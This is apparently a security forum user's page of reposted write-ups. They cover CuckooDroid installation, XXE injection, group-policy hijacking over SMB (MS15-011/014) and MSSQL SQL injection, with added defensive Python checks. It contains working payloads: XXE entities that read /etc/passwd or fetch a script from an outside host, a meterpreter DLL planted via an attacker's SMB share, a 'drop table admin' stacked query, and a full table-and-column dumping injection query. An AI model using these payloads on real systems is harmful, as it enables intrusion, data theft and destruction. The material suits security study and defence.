Everything posted by Nytro
Stop picking on my fan
CuckooDroid - Automated Android Malware Analysis

Contributed by Check Point Software Technologies LTD.

CuckooDroid is an extension of Cuckoo Sandbox, the Open Source software for automating analysis of suspicious files. CuckooDroid brings to Cuckoo the capabilities of execution and analysis of Android applications.

Installation - Easy integration script:

    git config --global user.email "you@example.com"
    git config --global user.name "Your Name"
    git clone --depth=1 https://github.com/cuckoobox/cuckoo.git cuckoo
    cd cuckoo
    git remote add droid https://github.com/idanr1986/cuckoo-droid
    git pull --no-edit -s recursive -X theirs droid master
    cat conf-extra/processing.conf >> conf/processing.conf
    cat conf-extra/reporting.conf >> conf/reporting.conf
    rm -r conf-extra
    echo "protobuf" >> requirements.txt

Documentation
CuckooDroid - CuckooDroid Book — CuckooDroid v1.0 Book
Cuckoo Sandbox - Cuckoo Sandbox Book — Cuckoo Sandbox v1.2 Book
You are advised to read the Cuckoo Sandbox documentation before using CuckooDroid!

Powered by:
Androguard -> https://code.google.com/p/androguard/
Google Play Unofficial Python API -> https://github.com/egirault/googleplay-api

Credit
botherder for linux_analyzer_dev -> https://github.com/cuckoobox/cuckoo/tree/linux_analyzer_dev

Authors
Idan Revivo - idanr@checkpoint.com (twitter: idanr86)
Ofer Caspi - oferc@checkpoint.com (twitter: @shablolForce)

Source: https://github.com/idanr1986/cuckoo-droid
XML External Entity attack (XXE) in a Nutshell
Posted on April 3, 2015 by chs

The XXE attack has been around for a few years, but hasn’t gotten much attention until the last couple of years with some high-profile cases in Facebook and PayPal. So, what is the XML External Entity attack? XXE is an abbreviation for XML External Entity. It is a part of the XML spec that allows a document to have entities that resolve to someplace external (not within the same document). Some examples probably describe it best. For example, let’s say that we have a web app that takes as input an xml file and displays it in a table.

Example 1

Here’s a sample input file:

<?xml version="1.0" encoding="utf-8"?>
<contacts>
  <contact>
    <login>bobw</login>
    <name>Bob Walker</name>
    <email>bob@bob.com</email>
  </contact>
  <contact>
    <login>ajones</login>
    <name>Alice Jones</name>
    <email>alice@alice.com</email>
  </contact>
</contacts>

This is processed and displays the following:

login  | name        | email
bobw   | Bob Walker  | bob@bob.com
ajones | Alice Jones | alice@alice.com

Pretty straightforward, right?
Example 2

Now, let’s take the same example and add an entity:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY foo "Foo">
]>
<contacts>
  <contact>
    <login>&foo;</login>
    <name>Bob Walker</name>
    <email>bob@bob.com</email>
  </contact>
  <contact>
    <login>ajones</login>
    <name>Alice Jones</name>
    <email>alice@alice.com</email>
  </contact>
</contacts>

This processes and displays:

login  | name        | email
Foo    | Bob Walker  | bob@bob.com
ajones | Alice Jones | alice@alice.com

What happened? On line 3 of the xml file we created an entity called foo which is the string, “Foo”. We then use that entity, &foo;, in place of Bob’s username on line 7. While processing the document the parser substituted “Foo” when it saw &foo;.

Example 3

Now let’s do something really interesting. Consider the following:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY foo SYSTEM "file:///etc/passwd">
]>
<contacts>
  <contact>
    <login>&foo;</login>
    <name>Bob Walker</name>
    <email>bob@bob.com</email>
  </contact>
  <contact>
    <login>ajones</login>
    <name>Alice Jones</name>
    <email>alice@alice.com</email>
  </contact>
</contacts>

This processes and displays:

login                                        | name        | email
root:X:0:0:root:/root:/bin/bash <redacted>   | Bob Walker  | bob@bob.com
ajones                                       | Alice Jones | alice@alice.com

What did it do? On line 3, the keyword SYSTEM means that this entity reference is external to the document. In this case, the external entity references /etc/passwd on the system that is processing the xml.
This causes the contents of /etc/passwd to be pulled into the document and then displayed.

Example 4

Up to this point, the attacks have been against the server. How can we attack the user? Consider this:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY foo SYSTEM "http://www.bitbucket.me/log/xss.php">
]>
<contacts>
  <contact>
    <login>&foo;</login>
    <name>Bob Walker</name>
    <email>bob@bob.com</email>
  </contact>
  <contact>
    <login>ajones</login>
    <name>Alice Jones</name>
    <email>alice@alice.com</email>
  </contact>
</contacts>

What do you think the external entity reference does here? It returns <script>alert('xss')</script>. When the table displays, that script is executed in the browser. (I’m not displaying the results like in previous examples because it would execute while you are reading this and it’s just an example showing that it’s vulnerable.)

I hope these examples give you a basic understanding of what the XXE vulnerability is. Next week I’ll talk about how to prevent it.

Source: XML External Entity attack (XXE) in a Nutshell - Geeky Thoughts
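The contact-upload endpoint described in the post accepts XML it never needs a DTD for, so the standard defence is to refuse any document that declares one before it ever reaches a parser. The following is an added example, not code from the original post or from its author: it reconstructs the four sample documents from Examples 1-4 (the file and URL in the SYSTEM entities are the ones the post shows), classifies each one by the kind of entity it declares, and parses only the DTD-free document the way the hardened endpoint would.

```python
"""Pre-parse XXE screening for an XML upload endpoint like the one in the article.

Added example, not code from the original post. The sample documents are
reconstructed from the article's examples; the policy is the usual mitigation of
refusing any document that carries a DTD, since the contact format never needs one.
"""
import re
import xml.etree.ElementTree as ET

# Constructed body shared by all four samples; %s is the first login value.
CONTACTS_BODY = """<contacts>
  <contact>
    <login>%s</login>
    <name>Bob Walker</name>
    <email>bob@bob.com</email>
  </contact>
  <contact>
    <login>ajones</login>
    <name>Alice Jones</name>
    <email>alice@alice.com</email>
  </contact>
</contacts>"""

XML_DECL = '<?xml version="1.0" encoding="utf-8"?>\n'

# Constructed inputs mirroring Examples 1-4 of the article.
NO_DTD = XML_DECL + CONTACTS_BODY % "bobw"
INTERNAL_ENTITY = XML_DECL + '<!DOCTYPE root [ <!ENTITY foo "Foo"> ]>\n' + CONTACTS_BODY % "&foo;"
FILE_ENTITY = XML_DECL + '<!DOCTYPE root [ <!ENTITY foo SYSTEM "file:///etc/passwd"> ]>\n' + CONTACTS_BODY % "&foo;"
URL_ENTITY = XML_DECL + '<!DOCTYPE root [ <!ENTITY foo SYSTEM "http://www.bitbucket.me/log/xss.php"> ]>\n' + CONTACTS_BODY % "&foo;"

_DOCTYPE_RE = re.compile(r"<!DOCTYPE", re.IGNORECASE)
# Entity name, then either SYSTEM/PUBLIC (external) or a quoted literal (internal);
# the optional '%' also catches parameter entities.
_ENTITY_RE = re.compile(r"<!ENTITY\s+(?:%\s+)?[^\s>]+\s+(SYSTEM|PUBLIC|[\"'])", re.IGNORECASE)
_SYSTEM_URI_RE = re.compile(r"<!ENTITY\s+(?:%\s+)?[^\s>]+\s+SYSTEM\s+[\"']([^\"']+)[\"']", re.IGNORECASE)


def classify(doc):
    """Return 'no-dtd', 'internal-entity' or 'external-entity'.

    Any <!DOCTYPE token counts, even one inside a comment, so the check fails
    closed rather than open.
    """
    if not _DOCTYPE_RE.search(doc):
        return "no-dtd"
    kinds = {m.group(1).upper() for m in _ENTITY_RE.finditer(doc)}
    if kinds & {"SYSTEM", "PUBLIC"}:
        return "external-entity"
    return "internal-entity"


def external_entity_targets(doc):
    """URIs that SYSTEM entities point at: what to log when an upload is refused."""
    return _SYSTEM_URI_RE.findall(doc)


def safe_parse_logins(doc):
    """Hardened version of the article's endpoint: refuse any DTD, then parse with
    ElementTree and return the login values it would render in the table."""
    verdict = classify(doc)
    if verdict != "no-dtd":
        targets = ", ".join(external_entity_targets(doc)) or "no URI"
        raise ValueError("rejected upload: %s (%s)" % (verdict, targets))
    root = ET.fromstring(doc)
    return [contact.findtext("login") for contact in root.findall("contact")]


def accepts(doc):
    """True if the hardened endpoint would process the document at all."""
    try:
        safe_parse_logins(doc)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    for label, doc in (("example 1", NO_DTD), ("example 2", INTERNAL_ENTITY),
                       ("example 3", FILE_ENTITY), ("example 4", URL_ENTITY)):
        print(label, classify(doc), external_entity_targets(doc), accepts(doc))
```

Refusing the DTD up front stops the server-side file read of Example 3 and the outbound fetch of Example 4 regardless of which XML library sits behind the endpoint; the rendering step still needs ordinary HTML output encoding, because the script in Example 4 would be just as dangerous if it arrived as a literal login value.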
How to own any windows network with group policy hijacking attacks
Nytro replied to Nytro's topic in Tutorials in English
"In this case, we can specify a meterpreter DLL payload using a UNC path on an SMB server we control and then next time a new process starts we will get a shell." That is, it takes it from a share. Over SMB. At runtime. E.g. \\10.0.13.37\metsrv.dll
How to own any windows network with group policy hijacking attacks
Author: Luke Jennings

For those of you that didn’t make it to SyScan ‘15 last week, this is a blog post version of the presentation I gave about the vulnerabilities I found in group policy that resulted in Microsoft releasing MS15-011 and MS15-014 in February. These bulletins resolve issues in Microsoft’s group policy engine that allow remote code execution at SYSTEM level if an attacker can intercept network traffic from a domain-joined system. The full process leading up to their discovery, along with exploitation details and accompanying video demonstrations, will be given. Additionally, the new security controls introduced by Microsoft will be discussed to assess how effective they are, show what attack scenarios they mitigate and which ones they do not. Finally, some additional guidance will be given on other mitigating controls that can provide additional protection.

How does group policy work?

Group policy is Microsoft’s core infrastructure for managing the configuration of both users and computers in an enterprise windows forest. Configuration settings can be grouped into group policy objects (GPOs) and these can be linked to various physical and logical groupings of computers and/or users. Alongside Microsoft Office, it is arguably the defining reason that Microsoft still dominate the business endpoint market. Some of its key selling points are summarised below:

- Allows highly flexible, centralised machine and user configuration over global enterprise networks
- Smart redundancy, designed to handle many sites/offices distributed over a global WAN
- It is key to enforcing security critical configuration settings across an enterprise

In a windows domain, there are domain members and domain controllers. Domain controllers store all GPOs and domain members communicate with domain controllers in order to determine which GPOs are relevant to them and to fetch the GPOs themselves.
At a high level, there are four key services that allow this to happen:

- DNS – Used to find the nearest domain controller
- RPC – Used to establish a secure channel with the domain controller and make various RPC calls
- LDAP – Used to query the high level group policy configuration and which GPOs should apply
- SMB – Used to get the full GPO content for each applicable GPO

There are a huge number of configurable settings that can be set via group policy but the wealth of these end up as enforced registry changes on the endpoint. However, some notable exceptions to this are those that involve user accounts or group membership changes and file creation/modification. Different settings fall within different client side extensions (CSEs) and these CSEs will only be enforced on the client side if it has been indicated via LDAP that the relevant CSE is applicable for any given GPO. There are a large number of CSEs but some examples include security settings, registry settings, user accounts/groups, internet explorer zones etc.

How can it be attacked?

First we will cover the situation prior to February 2015 (when MS15-011 and MS15-014 were released in response to these attacks) and look at what attack scenarios apply and how they could be exploited. The first important point to understand is that the sheer control group policy affords over system configuration means that if you can control group policy then you effectively have full SYSTEM equivalent control over the systems under it. Beyond that, we need to understand that each of the four key steps outlined earlier need to complete successfully in turn for the next one to begin. For example, if the RPC stage fails then we won’t reach the LDAP stage and so any attacks focused on later stages need to ensure the earlier stages complete. The focus of this post is on the latter two protocol stages of the group policy update process, LDAP and SMB.
These are the most interesting from a security perspective because LDAP is used to specify which GPOs and CSEs should apply to a host and SMB is used to fetch the individual GPOs including all the detailed configuration changes they contain. Control over either of these stages would give us significant control over the domain member that is fetching group policy.

So what security controls are in place to protect LDAP and SMB communications? Well the key concern here is that the domain member verifies the identity of the domain controller to ensure it is getting its group policy from a legitimate source and that integrity protection is in place to ensure the data cannot be tampered with in transit. These are principally handled via authentication within the protocols plus integrity protection in the form of LDAP signing and SMB signing. We will focus on SMB from this point forward as this would give the most flexible control over individual configuration options due to it being used to fetch the individual GPOs themselves.

There are configurable settings in group policy for controlling security critical options related to SMB signing. An excerpt of the “default domain controllers” policy is given below:

As you can see, the default behaviour for domain controllers is to require SMB signing. This is a good control to have in place as we would not want SMB connections pulling down GPO information from domain controllers without integrity protection in place. This was alluded to in one of Microsoft’s technet articles from back in 2010 with the following quote:

“SMB signing is available in all currently supported versions of Windows, but it’s only enabled by default on Domain Controllers. This is recommended for Domain Controllers because SMB is the protocol used by clients to download Group Policy information.
SMB signing provides a way to ensure that the client is receiving genuine Group Policy.”

However, that does not paint the full picture as it tells us nothing about the client. The relevant group policy options for specifying SMB signing on the client side are not specified in the “default domain policy”, which is applied to all domain members. Consequently, we need to look at what the default local configuration is. An excerpt of this showing the relevant settings is given below:

As can be seen, SMB signing is not set to be a requirement on the client side. This means that domain members acting as an SMB client will negotiate SMB signing but will not require it if it is not supported.

Defeating SMB Server Signing

If the domain member does not require SMB signing but the domain controller requires SMB signing then how do we attack it? If we were in a position intercepting network traffic then we could either allow signing to be negotiated and then the connection would go on fine but be protected, or we could prevent signing from being negotiated but the server would terminate the connection. However, we can avoid the domain controller SMB service altogether to eliminate the problem.
The key points outlining this are given below:

- We allow DNS, RPC and LDAP traffic to all pass through from the domain member to the domain controller unhindered
- We redirect SMB traffic to our own malicious SMB server via NATing rules or similar
- The “real” SMB service on the domain controller is never involved so we can force SMB signing to be disabled on our own malicious SMB server
- The domain member SMB client happily negotiates no signing and carries on with unprotected SMB communications talking to a malicious server

The diagram below gives an idea of how this attack would work in practice using ARP spoofing as the example traffic interception technique:

Getting a shell

What we have discussed so far is nice in theory but how do we practically exploit it to get a shell on the target system in practice? We could define login scripts, we could define new user accounts or abuse other settings to gain control. However, we need to remember that only the CSEs indicated to be active for a given GPO during the LDAP phase will be applied. The CSE for user management may not be in use, login scripts may not be in use and may not get us privileged access anyway etc. and so our ideal exploitation technique would depend only on CSEs in use by default and on options that would get us SYSTEM-level access. It turns out that the security settings CSE is applied by default and allows us to control arbitrary registry settings. If we make use of the GPO section for this and define our own custom registry settings then we have full control over the registry on the domain member, which is very powerful. There are various ways we could use this to get code execution such as defining “Run” keys, creating new services, defining new authentication providers etc. However, during my testing I settled on AppInit DLLs for a proof of concept. AppInit DLLs are DLLs that are loaded into any process when it starts.
My reason for choosing these was that no matter what, even on an inactive, untouched server that does not reboot, sooner or later a new process will be created in the background and load our DLL and there are also likely ways we can trigger a new process easily anyway. In this case, we can specify a meterpreter DLL payload using a UNC path on an SMB server we control and then next time a new process starts we will get a shell. If the system is running RDP then we can use rdesktop to connect, which will spawn a new winlogon.exe process as SYSTEM, loading our DLL payload and giving us a meterpreter shell as SYSTEM instantly. We will see a video of this exploit in action later but for now we will move on to considering a more secure configuration.

(Breaking) Secure Configuration

So at this point we have seen that the default configuration of a domain is vulnerable to man-in-the-middle (MITM) attacks against SMB when domain members fetch group policy. This is the basis of what eventually became MS15-011. However, this is due to a poor default configuration that can be resolved. What happens when you upgrade the configuration such that SMB signing is required by the clients? In this instance, I found a direct security control bypass vulnerability. I found that it was possible to deliberately corrupt the SMB communications when the security settings were being fetched, such that SMB signing would fail and the connection would be terminated. Now intuition would say that due to the failed application of group policy, the domain member would just remain at its existing configuration. However, it turned out that this was not the case and that as a product of the failure the group policy engine on the domain member would revert back to default configuration.
Since the default local configuration does not require SMB signing, the domain member would revert itself back to an insecure state and then the original attack would apply as a second stage on the next group policy refresh. This is what became MS15-014.

Hardened Configuration Exploit Process

Now we will summarise the full exploit process for exploiting a hardened environment, along with an exploit video to demonstrate it:

- ARP spoof domain member and domain controller
- Allow all protocols to pass through fine (DNS, RPC, LDAP and SMB)
- Wait until the security settings response comes back via SMB
- Corrupt the response to cause the domain member SMB signing requirement to revert
- Modify our NAT rules to redirect future SMB traffic to our own malicious SMB server
- Domain member will then fetch security settings containing our malicious AppInit DLL settings
- We make an unauthenticated RDP connection to the domain member to trigger a new SYSTEM winlogon.exe process
- Our handler receives a new meterpreter shell running as SYSTEM

The following video demonstrates this exploit in action exploiting both MS15-011 and MS15-014 in a staged attack to compromise hardened environments:

User vs Machine Attacks

Group policy contains separate settings for computers and users. Computer settings will always apply to the computer itself but user settings will apply depending on the user that logs on. Until now we have only really been considering computer settings. After discovering the previous two attacks, I considered what would be possible if they were fixed by Microsoft and that a network was configured securely and so I began looking at SMB signing in more detail. In the case of NTLM authentication, SMB signing uses a key derived from the password of the user account used for authentication. The interesting finding I made here was that, whilst the machine settings use the machine account to access SMB, the user settings actually use the user’s account.
Machine accounts by default use secure, randomly generated passwords and so we should not expect to be able to acquire or crack this password without already having gained SYSTEM access in the first place. This makes it a sensible account to be used as the basis of fetching group policy updates and should make the SMB signing mechanism strong. However, an ordinary user account may have a weak password or we may have discovered it through other means e.g. social engineering. In a privilege escalation scenario, it may even be our own account that is a low privileged domain account without any administrative control over domain members that it can login to. The key point here though is that if we know the password of a user logging into a system that we can intercept network traffic for then we can calculate SMB signatures correctly when user settings are fetched and so we can control the user settings part of group policy applied when they login.

The question then becomes whether this poses a problem or not. What is the real impact of controlling user settings for group policy? Well in order to exploit the issue we need to know the user’s password and so intuition would say it would not represent an issue as controlling a user’s own configuration is redundant when we already have access to everything they do anyway. However, it turns out that despite being “user” settings, they are actually a lot more powerful than that. There are CSEs for them that include the ability to add new user accounts or define arbitrary registry keys including within the SYSTEM hive and therefore controlling user settings can still be used to gain SYSTEM access on a domain member. The implication of this is that if you know the password for a low privileged user account logging in to a system that you can intercept network traffic for then you can use that to gain SYSTEM privileges.
There are probably two primary scenarios that this attack would apply to:

- You have a low privileged account and can use it to login interactively to physical workstations or virtual desktop farms that you can intercept network traffic for. In this instance you could escalate your privileges on them to SYSTEM.
- You are intercepting traffic on a large subnet full of laptop/desktop users and you know the passwords for a small number of uninteresting, low privileged users. However, you can use this knowledge to get full SYSTEM access to their endpoints, which may prove much more valuable to you.

The following video demonstrates exploitation of this issue:

Microsoft’s Response – MS15-011 and MS15-014

In February 2015, Microsoft introduced two security bulletins to address the vulnerabilities I reported. MS15-011 was not a bug fix but instead introduced an entire new configurable security control set known as “hardened UNC paths”, designed explicitly to thwart these types of attacks and more. They provide much more flexible and secure configuration over what happens when a UNC path is accessed than could be achieved previously. It is now possible to specify on a per-UNC path basis (with optional wildcards) what the security requirements for the connection are. Windows will then ensure it picks a transport mechanism that can meet those and ensures they are applied. Microsoft then give two recommended rules to configure as a minimum in a domain environment to protect against the attacks outlined before. These are shown below and essentially state that if the NETLOGON or SYSVOL shares are accessed on any domain controller then the OS should ensure it uses a transport and authentication method that allows mutual authentication and integrity protection and that those controls are enforced. This is actually further than I expected Microsoft to go and is a welcome step forward as they could have other potentially useful applications too.
The Microsoft recommended settings shown above will also effectively disallow NTLM as an authentication mechanism for group policy updates as it does not strictly allow mutual authentication and so it will enforce kerberos use in general. This new security control when combined with the configuration above successfully protects against the first attack we outlined.

In contrast, MS15-014 was a straight bug fix. There are no new security controls to configure here, it simply prevents the group policy processing engine from reverting back to the default local configuration when it encounters a failure during the retrieval of the security settings, which is intended to prevent the second attack we considered. I tested my original exploit against the patched version and sure enough the SMB signing settings remained in a secure state and so it seems this patch is effective.

What happened to “User settings” post-patch?

Microsoft are certainly aware of this exploit scenario as it was one of the three issues I originally reported but it was also the one I most felt may end up being “by design”. Nothing in the security bulletins for MS15-011 or MS15-014 specifically mentions this issue and it is not immediately obvious how hardened UNC paths would resolve this issue. My testing revealed that the user account was still used for authentication when fetching user settings, not the machine account, meaning the underlying issue is still there. So the question is does this exploit scenario still apply? Our previous exploit technique redirected the SMB traffic to our own malicious SMB server, where we also had a user configured with the same username and password. The domain member would negotiate SMB signing and use NTLM authentication and our server would know how to calculate the signature because it would know the password of the user account, which is used to derive the signing key.
However, with properly configured hardened UNC paths, the mutual authentication requirement means NTLM will not be used and kerberos will be enforced. How does this change the scenario?

Decrypting Kerberos Packets

We won’t be able to use the same exploit technique as before if kerberos is in use. Our malicious SMB server will not be able to authenticate itself to the domain member as it will not have the necessary keys to decrypt the service tickets that the domain member will supply to it. Additionally, the SMB signing keys are not a simple derivation of the user password when kerberos is used, they are generated by the SMB server and returned encrypted with the shared service key between the domain member and SMB server such that the domain member knows the signing key too. So is this an effective control? To understand that, we need to consider how a kerberos exchange works. The following diagram gives a simplified view of the process involved when a domain member wants to access the SMB service on a domain controller:

The AS-REP (step 2) response contains a session key encrypted with a key derived from the user’s password. If we are monitoring kerberos packets and know the user’s password then we can decrypt this. The TGS-REP response (step 4) then contains a service key encrypted with the session key from before. If we have been keeping track of decrypted session keys then we will be able to decrypt this too. Finally, the AP-REP response (step 6) contains a sub key (used for SMB signing) encrypted with the service key from the TGS-REP response. If we have been monitoring and decrypting all the correct packets then we should be able to decrypt this sub key too. If we can eventually derive this sub key then we have everything we need to make arbitrary modifications to SMB packets and recalculate the signatures. Therefore, it seems the user settings exploit scenario still applies.
To summarise, the following key steps apply in a post-patch, securely configured hardened UNC paths world:

- We monitor all kerberos exchanges and decrypt all AS-REP packets encrypted with user passwords we know to obtain session keys
- We decrypt any TGS-REP packets we can with the session keys we have collected to obtain service keys
- We decrypt any AP-REP packets we can with the service keys we have collected
- We use the sub keys we have obtained to make malicious changes to group policy information in SMB read responses and dynamically recalculate the SMB signatures on the fly
- We get our SYSTEM shells

The following video demonstrates this issue being exploited on a patched system with securely configured hardened UNC paths.

One important caveat to mention at this stage is that user settings are a bit less flexible than computer settings. Earlier we discussed how we used the security settings CSE for exploitation as this CSE would always apply no matter what was configured for a GPO and is forcibly re-applied periodically too. With user settings, we don’t have the same level of power by default unless certain more interesting CSEs are configured. In the exploit video above I had specifically configured a registry setting in the user settings GPO of the default domain policy such that the CSE for that applied and then my exploit modified the contents of the resulting XML file that was retrieved in order to inject a malicious AppInit DLL setting. In the default case though, this CSE would not be configured. However, something we have not looked at in much detail yet is LDAP. I mentioned previously that it is used to obtain the GPOs that should apply to a system or user (uniquely identified by GUIDs) along with which CSEs are enabled for them and then SMB is used to retrieve the detailed GPO settings for each of these. When user settings are fetched, the user account (rather than the machine account) is also used to authenticate to LDAP using kerberos.
Consequently, a very similar process to before is conducted to negotiate a signing key for LDAP. By monitoring and decrypting kerberos packets, we should be able to derive this key in the same way and make arbitrary changes to the LDAP packets. This would mean that we could specify to enable whatever CSEs we are interested in using for our exploit and as such ensure that we can exploit this issue in the default case. Whilst I haven’t got as far as writing the code to verify this 100%, there is no reason why this should not work in exactly the same way as the SMB dynamic signature recalculation demonstrated practically in the video above.

Alternative security controls

All of these attacks are MITM attacks and so generally rely upon traffic interception techniques in order to conduct them. The most common and viable of these are layer 2 based, such as ARP spoofing, which is what was used in all exploit demonstrations above. There are a range of standard prevention and detection techniques for the various traffic interception attacks out there that are well worth investigating to provide additional protection against the attacks outlined in this blog post, as well as a range of other attacks that are dependent on traffic interception.

Conclusion

This concludes a pretty long and complicated blog post but I hope it has been interesting. Below, I’ll summarise some of the key take home points from all of this:

- Prior to February 2015, all enterprise windows networks were vulnerable to MITM attacks that would allow an unauthenticated attacker to gain SYSTEM privileges on any domain member. All versions of windows from XP/2003 to 8.1/2012R2 were vulnerable.
- MS15-011 and MS15-014 introduced new security features and bug fixes to protect against these attacks in the form of a new security control called “hardened UNC paths”.
- Microsoft have no intention of fixing XP/2003 and so these OS versions remain vulnerable.
- Vista/2008 onwards are still vulnerable in their default state as hardened UNC paths are not default. You need to configure them explicitly to Microsoft’s recommended configuration and apply it across your entire estate using group policy.
- Even on Vista/2008 onwards, user settings group policy can be exploited if you know a user’s password to conduct a form of privilege escalation to gain SYSTEM on domain members. Microsoft have shown no intention thus far of providing a control to protect against this.
- All exploit scenarios rely on MITM attacks and so existing controls to prevent and detect traffic interception attacks are a good way to provide additional protection against these issues. This is particularly important for XP/2003, which Microsoft have not patched, or if you are particularly concerned about the user settings related privilege escalation style attacks, for which Microsoft have provided no direct protection.

Source: https://labs.mwrinfosecurity.com/blog/2015/04/02/how-to-own-any-windows-network-with-group-policy-hijacking-attacks/
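The post's closing point is that hardened UNC paths protect nothing until the two rules for NETLOGON and SYSVOL are explicitly configured and pushed to every domain member. The following is an added example, not code from the original post, from MWR or from Microsoft: a small auditor that takes a hardened-paths rule set in the form the policy stores it (value name = UNC path with an optional `*` for the whole server or share component, value data = a comma-separated list such as `RequireMutualAuthentication=1, RequireIntegrity=1`; this format is Microsoft's, the component-wise wildcard matching is my simplified reading of it and is an assumption), works out which protections a given UNC path would get, and answers the question the post raises: does this rule set cover group policy retrieval from any domain controller at all?

```python
"""Audit Windows "hardened UNC paths" (the MS15-011 control) against a rule set.

Added example, not code from the original post or from Microsoft. Assumptions:
the rule set is a dict of value name -> value data as stored under the Hardened
UNC Paths policy, where the value name is a UNC path whose server or share
component may be the wildcard '*', and the data is a comma-separated list such as
"RequireMutualAuthentication=1, RequireIntegrity=1". The matcher is a simplified
model of Windows' behaviour (exact or whole-component wildcard match, case-
insensitive), written for auditing rather than as a reimplementation.
"""


def parse_rule_value(value):
    """Turn 'RequireMutualAuthentication=1, RequireIntegrity=0' into a dict of booleans."""
    requirements = {}
    for item in value.split(","):
        item = item.strip()
        if not item:
            continue
        key, _, flag = item.partition("=")
        requirements[key.strip()] = flag.strip() == "1"
    return requirements


def split_unc(path):
    r"""Return (server, share), lower-cased, from a path like \\dc01\SYSVOL\domain\Policies."""
    parts = path.lstrip("\\").split("\\")
    if len(parts) < 2 or not parts[0] or not parts[1]:
        raise ValueError("not a UNC path: %r" % path)
    return parts[0].lower(), parts[1].lower()


def required_protections(unc_path, rules):
    """Merge every rule matching the path; a protection is required if any matching rule sets it."""
    server, share = split_unc(unc_path)
    merged = {}
    for rule_path, value in rules.items():
        rule_server, rule_share = split_unc(rule_path)
        if rule_server != "*" and rule_server != server:
            continue
        if rule_share != "*" and rule_share != share:
            continue
        for key, required in parse_rule_value(value).items():
            merged[key] = merged.get(key, False) or required
    return merged


def group_policy_fetch_hardened(rules):
    """Audit check: NETLOGON and SYSVOL on *any* domain controller must require
    mutual authentication and integrity, the minimum the post describes.
    The probe host name is constructed and only exercises the '*' server wildcard."""
    probe_host = r"\\dc-probe.example.test"  # constructed, not a real host
    for share in ("NETLOGON", "SYSVOL"):
        req = required_protections(probe_host + "\\" + share + "\\x", rules)
        if not (req.get("RequireMutualAuthentication") and req.get("RequireIntegrity")):
            return False
    return True


# Rule set in the shape of the recommended minimum (constructed for this example).
RECOMMENDED_RULES = {
    r"\\*\NETLOGON": "RequireMutualAuthentication=1, RequireIntegrity=1",
    r"\\*\SYSVOL": "RequireMutualAuthentication=1, RequireIntegrity=1",
}

if __name__ == "__main__":
    print(required_protections(r"\\dc01.corp.example\SYSVOL\corp.example\Policies", RECOMMENDED_RULES))
    print(required_protections(r"\\fileserver\data\report.txt", RECOMMENDED_RULES))
    print("no rules (default state) hardened?", group_policy_fetch_hardened({}))
    print("recommended rules hardened?", group_policy_fetch_hardened(RECOMMENDED_RULES))
```

Feeding it an empty rule set reproduces the default state the post warns about (no protection required for any path), while a rule set that only names one specific domain controller also fails the check, since a client can fetch policy from any DC it locates via DNS. Note that even with the recommended rules the `fileserver` path gets nothing, which is the designed scope of the control, and that, as the post explains, the rules do not address the user-settings scenario where the attacker already knows the user's password.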
Retrieving all tables and their columns at once MSSQL
Nytro replied to Nytro's topic in Web security
Yeah, the post displays badly, go to the original link: https://rdot.org/forum/showthread.php?t=3251
In the Name of ALLAH the Most Beneficent and the Merciful

Zenodermus, Ch3rn0by1 and me were working on MSSQL when Zenodermus thought to make a DIOS for MSSQL. Previously, at The SQL Injection Knowledge Base, DIOS is under the heading Retrieving Multiple Tables and Columns:

    AND 1=0;
    BEGIN
        DECLARE @xy varchar(8000)
        SET @xy=':'
        SELECT @xy=@xy+' '+name FROM sysobjects WHERE xtype='U' AND name>@xy
        SELECT @xy AS xy INTO TMP_DB
    END;

but that's output is like

    table1:column1
    table1:column2
    table1:column3
    table2:column1
    table2:column2
    table2:column3
    table3:column1

and so on.. but after adding some cosmetics to this query by Zenodermus it became cool, like this, you can see in this pic.. but due to the character limit in the available datatype VARCHAR(8000) we cannot see the complete output (meaning all tables and columns).. just because each time the table is written with each column.. so we decided to make it more cool and tried to display all data.. meaning the complete tables and columns list.. and later after surfing on MSDN, Google and MSSQL documentation we came to know that the actual length of varchar(MAX) or varchar(8000) is not 8000, it is 4000 even when you declare it MAX or 8000, and then it became our obsession to make it.. and now our final query output is.. like this..

Well, before going into this you must know about Stacked Queries.. I will recommend to read the complete article at Stacked Queries - SQL Injection Attacks. In simple words, with Stacked Queries we can execute multiple statements in the same query to extend the possibilities of SQL injections, e.g.

    SELECT * FROM products WHERE productid=1; drop table admin

realistic example.. Salesforce1*Platform: Trusted Application Development Platform - Salesforce.com Drop table admin-- -

Stacked query support:
- MySQL/PHP - Not supported (supported by MySQL for other API).
- SQL Server/Any API - Supported.
- Oracle/Any API - Not supported.

Our final query is..
BEGIN
DECLARE @data VARCHAR(8000), @counter int, @tblName VARCHAR(50), @colNames VARCHAR(100)
DECLARE @TMPTbl TABLE (name VARCHAR(8000) NOT NULL)
SET @counter = 1
SET @data = 'injected by rummykhan :: '+ @@VERSION +' Database :: '+ DB_NAME()
SET @tblName = ''
SET @colNames = ''
WHILE @counter<=(SELECT COUNT(table_name) FROM INFORMATION_SCHEMA.TABLES)
BEGIN
    SET @colNames = ''
    SELECT @tblName = table_name FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN (select name from @TMPTbl)
    SELECT @colNames = @colNames + column_name +' : ' FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = @tblName
    INSERT @TMPTbl VALUES(@tblName)
    SET @data = @data + 'Table : '+ @tblName +' Columns : '+ @colNames
    SET @counter = @counter + 1
END
SELECT @data AS output INTO Challenge
END

Well, this query looks horrible but it actually is not. Let's go deep into this query.

With BEGIN and END we declare a batch/group of statements to be executed together.

The next step is declaring supporting variables for holding table_name, column_name, a counter, one variable that can hold all table names and column names, and one table with one column which will act as a collection used to hold all the table names (I will explain its use later).

The next step is initializing the declared variables. We cannot use these uninitialized variables in a SELECT statement, that's why they are initialized with empty strings, and @data with the database version and database name for display in the output.

The next step is the WHILE loop. This statement

WHILE @counter<=(SELECT COUNT(table_name) FROM INFORMATION_SCHEMA.TABLES)

will bound this loop to run through all tables.

At the next step @colNames is re-initialized with an empty string every time, to hold the columns of only one table at a time.
The next step is getting a table_name into @tblName and the column_names for that table into @colNames, and adding the values of both @tblName and @colNames into @data.

Now explaining this part:

SELECT @tblName = table_name FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN (select name from @TMPTbl)

With this query

SELECT @tblName = table_name FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME ...

